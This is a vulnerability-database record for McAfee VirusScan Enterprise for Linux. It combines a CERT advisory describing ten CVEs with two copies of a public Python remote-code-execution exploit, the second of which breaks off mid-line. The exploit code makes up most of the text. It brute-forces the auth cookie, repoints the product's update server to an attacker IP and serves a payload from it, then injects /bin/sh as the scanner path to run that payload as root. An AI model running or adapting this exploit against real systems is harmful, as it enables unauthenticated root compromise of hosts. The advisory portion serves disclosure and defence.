\npostdata = (\"pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&mon%3A0=sconf+{1}+begin&info%3A0=\" \\ \n\"multi%2Cshow&mon%3A1=sconf+{1}+delete+{0}+section%3Dnailsd.profile.{1}.filter+section%3Dnailsd.prof\" \\ \n\"ile.{1}.action&mon%3A2=sconf+{1}+set+{0}+nailsd.profile.{1}.allFiles%3Dtrue+nailsd.profile.{1}.child\" \\ \n\"InitTmo%3D240+nailsd.profile.{1}.cleanChildren%3D2+nailsd.profile.{1}.cleansPerChild%3D10000+nailsd\" \\ \n\".profile.{1}.datPath%3D%2Fopt%2FNAI%2FLinuxShield%2Fengine%2Fdat+nailsd.profile.{1}.decompArchive%3\" \\ \n\"Dtrue+nailsd.profile.{1}.decompExe%3Dtrue+nailsd.profile.{1}.engineLibDir%3D%2Fopt%2FNAI%2FLinuxShi\" \\ \n\"eld%2Fengine%2Flib+nailsd.profile.{1}.enginePath%3D{3}+nailsd.profile.{1}.factoryI\" \\ \n\"nitTmo%3D240+nailsd.profile.{1}.heuristicAnalysis%3Dtrue+nailsd.profile.{1}.macroAnalysis%3Dtrue+na\" \\ 
\n\"ilsd.profile.{1}.maxQueSize%3D32+nailsd.profile.{1}.mime%3Dtrue+nailsd.profile.{1}.noJokes%3Dfalse+\" \\ \n\"nailsd.profile.{1}.program%3Dtrue+nailsd.profile.{1}.quarantineChildren%3D1+nailsd.profile.{1}.quar\" \\ \n\"antineDirectory%3D%2Fquarantine+nailsd.profile.{1}.quarantineFromRemoteFS%3Dfalse+nailsd.profile.{1\" \\ \n\"}.quarantinesPerChild%3D10000+nailsd.profile.{1}.scanChildren%3D2+nailsd.profile.{1}.scanMaxTmo%3D3\" \\ \n\"00+nailsd.profile.{1}.scanNWFiles%3Dfalse+nailsd.profile.{1}.scanOnRead%3Dtrue+nailsd.profile.{1}.s\" \\ \n\"canOnWrite%3Dtrue+nailsd.profile.{1}.scannerPath%3D{4}+nailsd.profile.{1}.scansPerChild\" \\ \n\"%3D10000+nailsd.profile.{1}.slowScanChildren%3D0+nailsd.profile.{1}.filter.0.type%3Dexclude-path+na\" \\ \n\"ilsd.profile.{1}.filter.0.path%3D%2Fproc+nailsd.profile.{1}.filter.0.subdir%3Dtrue+nailsd.profile.{\" \\ \n\"1}.filter.1.type%3Dexclude-path+nailsd.profile.{1}.filter.1.path%3D%2Fquarantine+nailsd.profile.{1}\" \\ \n\".filter.1.subdir%3Dtrue+nailsd.profile.{1}.filter.extensions.mode%3Dall+nailsd.profile.{1}.filter.e\" \\ \n\"xtensions.type%3Dextension+nailsd.profile.{1}.action.Default.primary%3DClean+nailsd.profile.{1}.act\" \\ \n\"ion.Default.secondary%3DQuarantine+nailsd.profile.{1}.action.App.primary%3DClean+nailsd.profile.{1}\" \\ \n\".action.App.secondary%3DQuarantine+nailsd.profile.{1}.action.timeout%3DPass+nailsd.profile.{1}.acti\" \\ \n\"on.error%3DBlock&mon%3A3=sconf+{1}+commit+{0}&mon%3A4=db+set+{0}+_table%3Dschedule++taskName%3D{2}+\" \\ \n\"taskType%3DOn-Demand+taskInfo%3DprofileName%3D{1}%2Cpaths%3Dpath%3A%2Ftmp%3Bexclude%3Atrue+timetabl\" \\ \n\"e%3Dtype%3Dunscheduled+progress%3D+status%3DIdle+&mon%3A5=task+nstart+{2}&mon%3A6=db+select+_asc%3D\" \\ \n\"taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+\" \\ \n\"_show%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dpro\" \\ 
\n\"gress+_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offs\" \\ \n\"et%3D0&info%3A6=multi%2Cshow&mon%3A7=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A7=mult\" \\ \n\"i%2Cshow&mon%3A8=sconf+ODS+begin&info%3A8=multi%2Cshow%2Cdigest&mon%3A9=task+updatecrontab&info%3A9\" \\ \n\"=multi%2Cshow&loc%3A10=conf+get+browser.resultsPerPage&info%3A10=multi%2Cshow&echo%3A11=1&info%3A11\" \\ \n\"=pageNo&echo%3A12=&info%3A12=selectedTask\").format(commit_id, ODS_name, scan_name,payload_path, binary_path) \n \nheaders = {'Content-Type': 'application/x-www-form-urlencoded'} \nr = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers) \nr.raise_for_status() \n \npprint(\"Payload executed\", 1) \n \ndef start_update_server(): \n \nclass RequestHandler(BaseHTTPRequestHandler): \ndef do_HEAD(s): \ns.send_response(200) \ns.send_header(\"Content-type\", \"text/html\") \ns.end_headers() \n \ndef do_GET(s): \nif s.path == \"/catalog.z\": \ns.send_response(200) \ns.send_header(\"Content-type\", \"text/html\") \ns.end_headers() \ns.wfile.write(bytes(payload, \"utf-8\")) \n \npprint(\"Payload placed\", 1) \n \npayload_in_place.set() \n \n# Die after sending payload so we send an incomplete response \nraise KillServer \n \nelse: # Assume all other requests are for SiteStat - Always increasing version \ns.send_response(200) \ns.send_header(\"Content-type\", \"text/xml\") \ns.end_headers() \ns.wfile.write(bytes((\"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\"\"\" \\ \n\"\"\"<SiteStatus Status=\"Enabled\" CatalogVersion=\"2%d\">\"\"\" \\ \n\"\"\" </SiteStatus>\"\"\") % int(time.time()), \"utf-8\")) \n \n# Throwing KillServer will shutdown the server ungracefully \nclass KillServer(Exception): \ndef __str__(self): \nreturn \"Kill Server (not an error)\" \n \n# ThreadingMixIn plus support for KillServer exceptions \nclass AbortableThreadingMixIn(ThreadingMixIn): \ndef process_request_thread(self, request, 
client_address): \ntry: \nself.finish_request(request, client_address) \nself.shutdown_request(request) \nexcept KillServer: \npprint(\"Killing update server dirtily\") \nself.shutdown_request(request) \nself.shutdown() # Only if we want to shutdown \nexcept: \nself.handle_error(request, client_address) \nself.shutdown_request(request) \n \n \nclass BackgroundHTTPSrv(AbortableThreadingMixIn, HTTPServer): \npass \n \npprint(\"Launching update server\") \n \nsrv = BackgroundHTTPSrv((local_ip, update_server_port), RequestHandler) \nthreading.Thread(target=srv.serve_forever).start() \n \npprint(\"Update server started\", 1) \nreturn srv \n \n \n#################################################################################### \n#################################################################################### \n \npprint(\"Attacking %s\" % target_domain, 1) \n \n# Crack the auth cookie \ncookie = crack_cookie() \nauth_cookie = {\"nailsSessionId\": cookie} \n \n# Start our update server locally \nsrv = start_update_server() \n \n# Force target to use our update server \nupdate_update_server(auth_cookie) \n \n# Make target download an update from us \ndownload_update(auth_cookie) \n \n# Block until the target downloads our payload, \npayload_in_place.wait() \n \n# Shutdown our update server \nsrv.shutdown() \n \n# Execute /bin/sh -(?) 
catalog.z \nexec_catalogz(auth_cookie) \n \n`\n", "viewCount": 38, "hash": "3e2948b5d852c5d5544c7f875083bf93fd501f619ae4c002720fcad99792fcfc", "sourceHref": "https://packetstormsecurity.com/files/download/140147/mvsel-exec.txt", "title": "McAfee Virus Scan Enterprise For Linux Remote Code Execution", "modified": "2016-12-14T00:00:00", "history": [], "href": "https://packetstormsecurity.com/files/140147/McAfee-Virus-Scan-Enterprise-For-Linux-Remote-Code-Execution.html", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d256ff4c7eb269f85319842163871350", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "d618bfb4271cabd52089f9b04433ae84", "key": "href"}, {"hash": "1ac4c362d435a40acf97fe0a9efae1f3", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "1ac4c362d435a40acf97fe0a9efae1f3", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "0e7189ecca28c68f6d5b872258eabecb", "key": "reporter"}, {"hash": "925c8db643322528cbb94bf19d260f76", "key": "sourceData"}, {"hash": "2ec2fa6bb9926d78d7273fcc822badbb", "key": "sourceHref"}, {"hash": "c6e49b792783248f2f362dad295169f7", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}], "objectVersion": "1.2", "edition": 1, "description": "", "bulletinFamily": "exploit", "reporter": "Andrew Fasano", "cvss": {"vector": "NONE", "score": 0.0}, "lastseen": "2016-12-14T02:03:47"}
{"cert": [{"lastseen": "2019-10-09T19:49:01", "bulletinFamily": "info", "description": "### Overview \n\nMcAfee VirusScan for Linux contains multiple vulnerabilities.\n\n### Description \n\nMcAfee VirusScan for Linux version 2.0.3 and prior is vulnerable to the following:\n\n[**CWE-200**](<http://cwe.mitre.org/data/definitions/200.html>)**: Information Exposure - **CVE-2016-8016 \n \nMultiple pages within the web interface utilize a `tplt` parameter. An authenticated remote attacker can manipulate the value of the `tlpt` parameter to produce error messages that can reveal the existence of unauthorized files on the system, if the attacker can guess the filename. \n \n[**CWE-75**](<http://cwe.mitre.org/data/definitions/75.html>)**: Failure to Sanitize Special Elements into a Different Plane (Special Element Injection) - **CVE-2016-8017 \n \nAn authenticated remote attacker may be able to place special text elements such as \"__REPLACE_THIS__\" or \"[%\" and \"%]\" with special meaning to the software parser into user input such that the special element may be injected into system processes such as log readers. When the log is read, the software will read these special elements as commands and take appropriate actions. An attacker may be able to use this vulnerability to remotely read files on the webserver as the nails user. \n \n[**CWE-352**](<http://cwe.mitre.org/data/definitions/352.html>)**: Cross-Site Request Forgery (CSRF) - **CVE-2016-8018 \n \nThe web interface does not make use of anti-CSRF tokens and therefore may be vulnerable to CSRF. \n \n[**CWE-79**](<http://cwe.mitre.org/data/definitions/79.html>)**: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - **CVE-2016-8019 \n \nMultiple pages within the web interface utilize a tplt parameter. When _tplt _is set to _NailsConfig.html _or _MonitorHost.html_, parameters _info:7 _and _info:5 _contain user input and are not properly verified. 
An unauthenticated remote attacker may spoof the values of info:7 and info:5 to execute arbitrary JavaScript code. \n \n[**CWE-94**](<http://cwe.mitre.org/data/definitions/94.html>)**: Improper Control of Generation of Code ('Code Injection') - **CVE-2016-8020 \n \nOn the final page of the system scan form, the _nailsd.profile.ODS_9.scannerPath _variable contains the path that the system will execute to run the scan. An authenticated remote user may manipulate this value in the HTTP request to execute an arbitrary binary as the root user. \n \n[**CWE-347**](<http://cwe.mitre.org/data/definitions/347.html>)**: Improper Verification of Cryptographic Signature - **CVE-2016-8021 \n \nThe web interface does not properly verify the cryptographic signature of the file, allowing a remote attacker to spoof the update server and execute arbitrary code. \n \n[**CWE-290**](<http://cwe.mitre.org/data/definitions/290.html>)**: Authentication Bypass by Spoofing - **CVE-2016-8022 \n \nThe web interface uses an authentication cookie that embeds the users' IP address into the cookie. A remote attacker may be able to manipulate the cookie in such a way that the service believes the cookie was sent from the victim's IP address. \n \n[**CWE-302**](<http://cwe.mitre.org/data/definitions/302.html>)**: Authentication Bypass by Assumed-Immutable Data - **CVE-2016-8023 \n \nThe web interface uses an authentication cookie that embeds the server start time as the DATE parameter. A remote attacker may be able to brute-force guess the server start time stored in DATE, which may lead to authentication bypass. \n \n[**CWE-113**](<http://cwe.mitre.org/data/definitions/113.html>)**: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting') - **CVE-2016-8024 \n \nA remote attacker may be able to spoof an HTTP GET request for a CSV export of the system logs with newlines encoded in the URL in such a manner that arbitrary HTTP headers may be spoofed in the server response. 
\n \n[**CWE-89**](<http://cwe.mitre.org/data/definitions/89.html>)**: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') - **CVE-2016-8025 \n \nThe web interface's CSV log export functionality encodes a SQL command into the URL. A remote attacker may be able to include arbitrary SQL commands URL-encoded in an HTTP request, thereby executing SQL commands on the backend SQLite database. This database does not contain authentication information, only data about settings and previously scanned files. \n \nFor more information, please see [McAfee Security Bulletin SB10181](<https://kc.mcafee.com/corporate/index?page=content&id=SB10181>) and the researcher's [blog post](<https://nation.state.actor/mcafee.html>). \n \nThe CVSS score below is based on CVE-2016-8023. For further CVSS scoring and analysis, please see McAfee Security Bulletin SB10181. \n \nPreviously this Vulnerability Note also contained one vulnerability for the Windows platform. This issue was republished as its own [VU#535111](<http://www.kb.cert.org/vuls/id/535111>) to prevent product confusion. \n \n--- \n \n### Impact \n\nA remote unauthenticated attacker may be able to read limited subsets of files and logs on the system, execute arbitrary JavaScript code in the web interface, or execute arbitrary code on the system. \n \n--- \n \n### Solution \n\n**Upgrade to a new product** \n \nMcAfee has discontinued the VirusScan for Linux product in favor of the new McAfee [Endpoint Security](<http://www.mcafee.com/us/products/endpoint-protection/endpoint-security.aspx>) product, which addresses these vulnerabilities. McAfee recommends that affected users upgrade to Endpoint Security version 10.2 or later as soon as possible. The upgrade is available free of charge to existing users with current licenses. 
\n \n--- \n \n### Vendor Information\n\n245327\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ McAfee\n\nNotified: December 05, 2016 Updated: December 12, 2016 \n\n**Statement Date: December 12, 2016**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nMcAfee has released [Security Bulletin SB10181](<https://kc.mcafee.com/corporate/index?page=content&id=SB10181>) for this issue.\n\n### Vendor References\n\n * [https://kc.mcafee.com/corporate/index?page=content&id=SB10181](<https://kc.mcafee.com/corporate/index?page=content&id=SB10181>)\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C \nTemporal | 7.3 | E:POC/RL:OF/RC:C \nEnvironmental | 5.5 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * [https://kc.mcafee.com/corporate/index?page=content&id=SB10181](<https://kc.mcafee.com/corporate/index?page=content&id=SB10181>)\n * <https://nation.state.actor/mcafee.html>\n\n### Acknowledgements\n\nThanks to Andrew Fasano for reporting these vulnerabilities to us.\n\nThis document was written by Garret Wassermann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2016-8016, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8016>) [CVE-2016-8017, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8017>) [CVE-2016-8018, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8018>) [CVE-2016-8019, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8019>) [CVE-2016-8020, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8020>) [CVE-2016-8021, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8021>) [CVE-2016-8022, 
](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8022>) [CVE-2016-8023, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8023>) [CVE-2016-8024, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8024>) [CVE-2016-8025](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8025>) \n---|--- \n**Date Public:** | 2016-12-09 \n**Date First Published:** | 2016-12-12 \n**Date Last Updated: ** | 2016-12-13 20:37 UTC \n**Document Revision: ** | 64 \n", "modified": "2016-12-13T20:37:00", "published": "2016-12-12T00:00:00", "id": "VU:245327", "href": "https://www.kb.cert.org/vuls/id/245327", "type": "cert", "title": "McAfee VirusScan for Linux contains multiple vulnerabilities", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-02-15T21:23:18", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category remote exploits", "modified": "2016-12-13T00:00:00", "published": "2016-12-13T00:00:00", "href": "https://0day.today/exploit/description/26519", "id": "1337DAY-ID-26519", "title": "McAfee Virus Scan Enterprise for Linux - Remote Code Execution Exploit", "type": "zdt", "sourceData": "'''\r\nSource: https://nation.state.actor/mcafee.html\r\n \r\nVulnerabilities\r\n \r\nCVE-2016-8016: Remote Unauthenticated File Existence Test\r\nCVE-2016-8017: Remote Unauthenticated File Read (with Constraints)\r\nCVE-2016-8018: No Cross-Site Request Forgery Tokens\r\nCVE-2016-8019: Cross Site Scripting\r\nCVE-2016-8020: Authenticated Remote Code Execution & Privilege Escalation\r\nCVE-2016-8021: Web Interface Allows Arbitrary File Write to Known Location\r\nCVE-2016-8022: Remote Use of Authentication Tokens\r\nCVE-2016-8023: Brute Force Authentication Tokens\r\nCVE-2016-8024: HTTP Response Splitting\r\nCVE-2016-8025: Authenticated SQL Injection\r\nWhen chaned together, these vulnerabilities allow a remote attacker to execute code as root.\r\n'''\r\n#!/bin/python3\r\nimport time\r\nimport 
requests\r\nimport os\r\nimport sys\r\nimport re\r\nimport threading\r\nimport subprocess\r\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\r\nfrom socketserver import ThreadingMixIn\r\n \r\n# Per-target configuration\r\ntarget_domain=\"https://10.0.1.130\" # https://target_ip\r\nlocal_ip = '10.0.1.128' # Attacker IP for victim to connect back to\r\nauthorized_ip=\"127.0.0.1\" # IP address cookie will be valid for\r\nupdate_server_port = 8080 # Port update server listens on\r\ndelay_seconds = 10 # How long should the server take to serve the update\r\ntarget_port = 55443 # Port to target\r\n \r\n# Put payload script in payload.sh\r\n \r\n# Initialization\r\npayload_in_place = threading.Event()\r\nrequests.packages.urllib3.disable_warnings()\r\nwith open(\"payload.sh\", \"r\") as f:\r\n payload = f.read()\r\n \r\ndef pprint(inp, flag=False):\r\n pad = \"#\"\r\n if flag:\r\n pad = \"*\"\r\n print(\"\\n\" + pad+ \" \" + inp)\r\n \r\n \r\ndef crack_cookie():\r\n pprint(\"Cracking Cookie\")\r\n \r\n # A page that requires authentication\r\n url = target_domain + \":\" + str(target_port) + \"/0409/nails?pg=proxy&tplt=productUpdate.html\"\r\n \r\n # Start at the current time + 100 in case of recent login with clock skew\r\n date_val = int(time.time()+100)\r\n cookie_fmt = authorized_ip+\"/n/0/%d-checksum// \"+authorized_ip + \" \"*20\r\n \r\n # Make requests, print after every 600\r\n while True:\r\n cookie = cookie_fmt % date_val\r\n req_cookie = {\"nailsSessionId\": cookie}\r\n r = requests.get(url, cookies=req_cookie, verify=False)\r\n r.raise_for_status()\r\n \r\n if \"Set-Cookie\" in r.headers:\r\n valid_cookie = cookie\r\n timestamp = cookie.split(\"/\")[3].split(\"-\")[0]\r\n break\r\n \r\n elif date_val % 600 == 0:\r\n print(\"Now trying %s\" % time.asctime(time.localtime(date_val)))\r\n \r\n date_val -= 1\r\n \r\n pprint(\"Cookie Cracked: \" + timestamp, True)\r\n return valid_cookie\r\n \r\n \r\ndef update_update_server(auth_cookie):\r\n 
pprint(\"Updating update server\")\r\n \r\n # Replace McAfeeHttp update server with attacker local_ip:update_server_port\r\n url = target_domain + \":\" + str(target_port) + \"/0409/nails?pg=proxy&addr=127.0.0.1%3A65443&tplt=\" \\\r\n \"repository.html&sitelist=add&mon%3A0=db+set+1+_table%3Drepository+status%3D1+siteList%3D%253C%253F\" \\\r\n \"xml%2520version%253D%25221.0%2522%2520encoding%253D%2522UTF-8%2522%253F%253E%250A%253Cns%253ASiteLists\" \\\r\n \"%2520xmlns%253Ans%253D%2522naSiteList%2522%2520GlobalVersion%253D%2522PATTeELCQSEhZwxKf4PoXNSY4%2Fg%25\" \\\r\n \"3D%2522%2520LocalVersion%253D%2522Wed%252C%252030%2520Dec%25202009%252011%253A20%253A59%2520UTC%2522%2\" \\\r\n \"520Type%253D%2522Client%2522%253E%253CPolicies%2F%253E%253CSiteList%2520Default%253D%25221%2522%2520Na\" \\\r\n \"me%253D%2522SomeGUID%2522%253E%253CHttpSite%2520Type%253D%2522repository%2522%2520Name%253D%2522McAfee\" \\\r\n \"Http%2522%2520Order%253D%25221%2522%2520Server%253D%2522\"+local_ip+\"%253A\"+str(update_server_port) \\\r\n + \"%2522%2520Enabled%253D%25221%2522%2520Local%253D%25221%2522%253E%253CRelativePath%2F%253E%253CUseAuth%\" \\\r\n \"253E0%253C%2FUseAuth%253E%253CUserName%253E%253C%2FUserName%253E%253CPassword%2520Encrypted%253D%25220\" \\\r\n \"%2522%2F%253E%253C%2FHttpSite%253E%253CFTPSite%2520Type%253D%2522fallback%2522%2520Name%253D%2522McAfe\" \\\r\n \"eFtp%2522%2520Order%253D%25222%2522%2520Server%253D%2522ftp.nai.com%253A21%2522%2520Enabled%253D%25221\" \\\r\n \"%2522%2520Local%253D%25221%2522%253E%253CRelativePath%253ECommonUpdater%253C%2FRelativePath%253E%253CU\" \\\r\n \"seAuth%253E1%253C%2FUseAuth%253E%253CUserName%253Eanonymous%253C%2FUserName%253E%253CPassword%2520Encr\" \\\r\n \"ypted%253D%25221%2522%253ECommonUpdater%40McAfeeB2B.com%253C%2FPassword%253E%253C%2FFTPSite%253E%253C%\" \\\r\n \"2FSiteList%253E%253C%2Fns%253ASiteLists%253E+_cmd%3Dupdate+&mon%3A1=task+setsitelist&mon%3A2=db+select\" \\\r\n 
\"+_show%3DsiteList+_show%3Dstatus+_table%3Drepository&info%3A2=multi%2Cshow&reposProperty=repository&re\" \\\r\n \"posProperty=fallback&useOfProxy=on\"\r\n \r\n r = requests.get(url, cookies=auth_cookie, verify=False)\r\n r.raise_for_status()\r\n pprint(\"Updated update server\", True)\r\n \r\ndef download_update(req_cookie):\r\n pprint(\"Requesting target download payload\")\r\n \r\n # Send request to make target download payload\r\n url = target_domain + \":\" + str(target_port) + \"/0409/nails\"\r\n \r\n updateName = \"update_%d\" % int(time.time())\r\n postdata = (\"pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&scheduleOp=add&mon%3A0=db+set+1+_tab\" \\\r\n \"le%3Dschedule++taskName%3D{0}+taskType%3DUpdate+taskInfo%3DtoUpdate%3Ddat%253Bengine+timetable%3Dtype%\" \\\r\n \"3Dunscheduled+status%3DIdle++i_recurrenceCounter%3D0+&mon%3A1=task+nstart+{0}&mon%3A2=db+select+_asc%3D\" \\\r\n \"taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+_sh\" \\\r\n \"ow%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dprogress+\" \\\r\n \"_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offset%3D0&in\" \\\r\n \"fo%3A2=multi%2Cshow&mon%3A3=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A3=multi%2Cshow&loc\" \\\r\n \"%3A4=conf+get+browser.resultsPerPage&info%3A4=multi%2Cshow&mon%3A5=task+updatecrontab&info%3A5=multi%2\" \\\r\n \"Cshow&echo%3A6=1&info%3A6=pageNo&echo%3A7=&info%3A7=selectedTask\"\"\").format(updateName)\r\n \r\n headers = {'Content-Type': 'application/x-www-form-urlencoded'}\r\n r = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers)\r\n r.raise_for_status()\r\n \r\n pprint(\"Payload download requested\", 1)\r\n \r\n \r\ndef exec_catalogz(req_cookie):\r\n pprint(\"Making target execute payload\")\r\n \r\n #### Get commit_id and ODS_name\r\n url = target_domain + \":\" + str(target_port) + 
\"/0409/nails?pg=proxy&tplt=schedOnDemand.html&addr=127.0\" \\\r\n \".0.1:65443&mon:0=sconf+ODS+select+section%3Dnailsd.profile.ODS&info:0=multi,show,digest&echo:1=ODS&inf\" \\\r\n \"o:1=profileName&mon:2=sconf+ODS+select+section%3Dnailsd.profile.ODS_default&info:2=multi,show&echo:3=O\" \\\r\n \"DS_default&info:3=defaultProfileName&mon:4=sconf+ODS+select+attribute%3Dnailsd.oasEnabled&info:4=multi\" \\\r\n \",show&mon:5=extensions&info:5=multi,show&mon:6=db+select+_show=max(i_taskId)+_table=schedule&info:6=mu\" \\\r\n \"lti,show&mon:7=utco&info:7=single,show,serverUtcOffset&echo:8=generate&info:8=profileNameAction\"\r\n \r\n r = requests.get(url, cookies=req_cookie, verify=False)\r\n r.raise_for_status()\r\n \r\n regex = re.search(\"\\|digest=(.+?)\\|\", r.text)\r\n if not regex:\r\n print(\"\\nERROR: Could not get commit_id when generating evil scan\\n\")\r\n return False\r\n \r\n commit_id = regex.groups(1)[0]\r\n \r\n # Send request to start evil scan\r\n payload_path = \"%2Fopt%2FMcAfee%2Fcma%2Fscratch%2Fupdate%2Fcatalog.z\"\r\n binary_path = \"%2Fbin%2Fsh\" # Use \"%2fbin%2Fstatic-sh\" for versions 1.x\r\n \r\n url = target_domain + \":\" + str(target_port) + \"/0409/nails\"\r\n \r\n ODS_name = \"ODS_1\" # This may need to be increased if the name already exists\r\n scan_name = \"scan_%s\" % str(int(time.time()))\r\n \r\n postdata = (\"pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&mon%3A0=sconf+{1}+begin&info%3A0=\" \\\r\n \"multi%2Cshow&mon%3A1=sconf+{1}+delete+{0}+section%3Dnailsd.profile.{1}.filter+section%3Dnailsd.prof\" \\\r\n \"ile.{1}.action&mon%3A2=sconf+{1}+set+{0}+nailsd.profile.{1}.allFiles%3Dtrue+nailsd.profile.{1}.child\" \\\r\n \"InitTmo%3D240+nailsd.profile.{1}.cleanChildren%3D2+nailsd.profile.{1}.cleansPerChild%3D10000+nailsd\" \\\r\n \".profile.{1}.datPath%3D%2Fopt%2FNAI%2FLinuxShield%2Fengine%2Fdat+nailsd.profile.{1}.decompArchive%3\" \\\r\n 
\"Dtrue+nailsd.profile.{1}.decompExe%3Dtrue+nailsd.profile.{1}.engineLibDir%3D%2Fopt%2FNAI%2FLinuxShi\" \\\r\n \"eld%2Fengine%2Flib+nailsd.profile.{1}.enginePath%3D{3}+nailsd.profile.{1}.factoryI\" \\\r\n \"nitTmo%3D240+nailsd.profile.{1}.heuristicAnalysis%3Dtrue+nailsd.profile.{1}.macroAnalysis%3Dtrue+na\" \\\r\n \"ilsd.profile.{1}.maxQueSize%3D32+nailsd.profile.{1}.mime%3Dtrue+nailsd.profile.{1}.noJokes%3Dfalse+\" \\\r\n \"nailsd.profile.{1}.program%3Dtrue+nailsd.profile.{1}.quarantineChildren%3D1+nailsd.profile.{1}.quar\" \\\r\n \"antineDirectory%3D%2Fquarantine+nailsd.profile.{1}.quarantineFromRemoteFS%3Dfalse+nailsd.profile.{1\" \\\r\n \"}.quarantinesPerChild%3D10000+nailsd.profile.{1}.scanChildren%3D2+nailsd.profile.{1}.scanMaxTmo%3D3\" \\\r\n \"00+nailsd.profile.{1}.scanNWFiles%3Dfalse+nailsd.profile.{1}.scanOnRead%3Dtrue+nailsd.profile.{1}.s\" \\\r\n \"canOnWrite%3Dtrue+nailsd.profile.{1}.scannerPath%3D{4}+nailsd.profile.{1}.scansPerChild\" \\\r\n \"%3D10000+nailsd.profile.{1}.slowScanChildren%3D0+nailsd.profile.{1}.filter.0.type%3Dexclude-path+na\" \\\r\n \"ilsd.profile.{1}.filter.0.path%3D%2Fproc+nailsd.profile.{1}.filter.0.subdir%3Dtrue+nailsd.profile.{\" \\\r\n \"1}.filter.1.type%3Dexclude-path+nailsd.profile.{1}.filter.1.path%3D%2Fquarantine+nailsd.profile.{1}\" \\\r\n \".filter.1.subdir%3Dtrue+nailsd.profile.{1}.filter.extensions.mode%3Dall+nailsd.profile.{1}.filter.e\" \\\r\n \"xtensions.type%3Dextension+nailsd.profile.{1}.action.Default.primary%3DClean+nailsd.profile.{1}.act\" \\\r\n \"ion.Default.secondary%3DQuarantine+nailsd.profile.{1}.action.App.primary%3DClean+nailsd.profile.{1}\" \\\r\n \".action.App.secondary%3DQuarantine+nailsd.profile.{1}.action.timeout%3DPass+nailsd.profile.{1}.acti\" \\\r\n \"on.error%3DBlock&mon%3A3=sconf+{1}+commit+{0}&mon%3A4=db+set+{0}+_table%3Dschedule++taskName%3D{2}+\" \\\r\n \"taskType%3DOn-Demand+taskInfo%3DprofileName%3D{1}%2Cpaths%3Dpath%3A%2Ftmp%3Bexclude%3Atrue+timetabl\" \\\r\n 
\"e%3Dtype%3Dunscheduled+progress%3D+status%3DIdle+&mon%3A5=task+nstart+{2}&mon%3A6=db+select+_asc%3D\" \\\r\n \"taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+\" \\\r\n \"_show%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dpro\" \\\r\n \"gress+_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offs\" \\\r\n \"et%3D0&info%3A6=multi%2Cshow&mon%3A7=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A7=mult\" \\\r\n \"i%2Cshow&mon%3A8=sconf+ODS+begin&info%3A8=multi%2Cshow%2Cdigest&mon%3A9=task+updatecrontab&info%3A9\" \\\r\n \"=multi%2Cshow&loc%3A10=conf+get+browser.resultsPerPage&info%3A10=multi%2Cshow&echo%3A11=1&info%3A11\" \\\r\n \"=pageNo&echo%3A12=&info%3A12=selectedTask\").format(commit_id, ODS_name, scan_name,payload_path, binary_path)\r\n \r\n headers = {'Content-Type': 